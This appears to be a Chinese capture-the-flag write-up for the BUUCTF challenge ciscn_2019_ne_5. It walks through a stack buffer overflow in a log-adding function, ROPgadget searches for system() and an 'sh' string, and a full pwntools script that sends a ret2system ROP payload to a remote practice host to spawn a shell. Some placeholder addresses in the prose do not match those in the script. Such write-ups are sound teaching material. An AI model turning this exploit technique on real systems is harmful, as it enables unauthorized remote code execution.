buu-ciscn_2019_ne_5-好久不见50

1. 背景分析

目标程序是一个存在漏洞的二进制文件,我们可以通过以下方式利用漏洞获取 shell:

  1. 程序中存在 system() 函数,但没有明显的 /bin/sh 字符串。

  2. 使用工具(如 ROPgadget)发现程序中有 sh 字符串,可以利用它作为 system() 的参数。

  3. 程序的交互逻辑需要先输入密码,然后选择操作,最后通过溢出漏洞触发 ROP 链。

2. 具体步骤
步骤 1:确定偏移量

通过分析程序的漏洞点(例如通过格式化字符串漏洞或堆溢出漏洞),找到可以覆盖返回地址的偏移量。假设偏移量为 0x48 + 4

步骤 2:查找关键地址

使用工具(如 ROPgadgetIDA Pro)查找以下地址:

  • system() 函数的地址。

  • main() 函数的地址(用于防止程序崩溃)。

  • sh 字符串的地址。

示例命令:

bash复制

复制代码
ROPgadget --binary ./zzz --search "system"
ROPgadget --binary ./zzz --search "sh"

假设:

  • system() 的地址为 0x08048430

  • main() 的地址为 0x08048500

  • sh 的地址为 0x08048123

步骤 3:交互流程

程序的交互逻辑如下:

  1. 程序提示输入管理员密码。

  2. 程序提供选项,需要选择 1 添加 log。

  3. 程序提示输入新的 log,此时发送构造的 ROP 链。

  4. 再次选择操作,选择 4 触发漏洞。

步骤 4:构造 ROP 链

根据上述地址和偏移量,构造 ROP 链:

  1. 填充到返回地址的偏移量。

  2. 覆盖返回地址为 system() 的地址。

  3. system() 返回后跳转到 main(),防止程序崩溃。

  4. sh 的地址作为 system() 的参数。

步骤 5:发送 ROP 链并触发漏洞

通过网络交互,发送构造的 ROP 链,并触发漏洞。

第一个条件s1 == 'administrator'

ADDLog():我们看到这里是输入log,跟我们的flag有关系

a1是我们外面传进来的src = 48,读取128个就造成了溢出

复制代码
from pwn import *
 
context(os = 'linux',arch = 'i386',log_level = 'debug')
content = 0
elf = ELF('./zzz')
 
def main():
	if content == 1:
		p = process('zzz')
	else:
		p =remote('node5.buuoj.cn',25739)
	 
	#0x080482ea : sh
	sh_addr     = 0x080482ea
	system_addr = elf.sym['system']
	payload     = b'a' * (0x48+0x4) + p32(system_addr) + b'aaaa' + p32(sh_addr)
	
	p.sendlineafter("Please input admin password:",'administrator')
	p.sendlineafter("0.Exit\n:",'1')
	p.sendlineafter("Please input new log info:",payload)
	p.sendlineafter("0.Exit\n:",'4')
	
	p.interactive()
main()
相关推荐
bdgtd881786 小时前
动态修补C扩展模块的函数指针有哪些风险?安全的修补方案是什么?
c语言·开发语言·安全
深耕云原生6 小时前
Kubernetes 深入浅出系列 | 容器剖析之容器安全
安全·容器·kubernetes
bkspiderx6 小时前
安全扫描:目标主机支持RSA密钥交换问题
网络·nginx·安全·tls·rsa·弱算法
FreeBuf_6 小时前
Chrome高危零日漏洞PoC公开,已被用于野外攻击
linux·运维·服务器·安全·web安全
初学者_xuan8 小时前
Linux程序与进程和进程程序基础以及程序管理(零基础掌握版)
运维·计算机网络·网络安全·零基础·学习方法·linux程序管理
测试专家9 小时前
ARINC 825板卡的应用
大数据·网络·安全
奶油话梅糖12 小时前
深入解析交换机端口安全:Sticky MAC的工作原理与应用实践
网络·安全·macos
TGC达成共识14 小时前
解锁处暑健康生活
人工智能·科技·其他·安全·生活·美食·风景
jokr_14 小时前
C++ STL 顶层设计与安全:迭代器、失效与线程安全
java·c++·安全
zt1985q14 小时前
外网访问个人 IT 工具箱 it-tools
服务器·spring cloud·网络安全·云原生·eureka